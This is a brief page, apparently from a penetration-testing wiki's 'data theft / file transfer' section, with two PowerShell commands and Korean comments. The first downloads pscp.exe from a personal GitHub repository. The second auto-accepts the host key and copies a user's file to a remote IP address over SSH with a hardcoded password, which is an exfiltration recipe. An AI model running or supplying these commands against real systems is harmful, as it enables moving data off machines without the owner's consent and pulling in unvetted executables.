> For the complete documentation index, see [llms.txt](https://www.pentestwiki.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.pentestwiki.com/data-theft/file-transper/pscp.md).

# pscp

<pre class="language-powershell"><code class="lang-powershell"><strong># pscp 0.81 다운로드
</strong>wget https://github.com/Mick3y-ko/Tools/raw/refs/heads/main/pscp.exe -outf pscp.exe

<strong># 파일 이동
</strong>echo y | pscp.exe -P 2222 -pw 'Password123!' C:\Users\hello.txt root@15.164.228.151:/tmp
</code></pre>
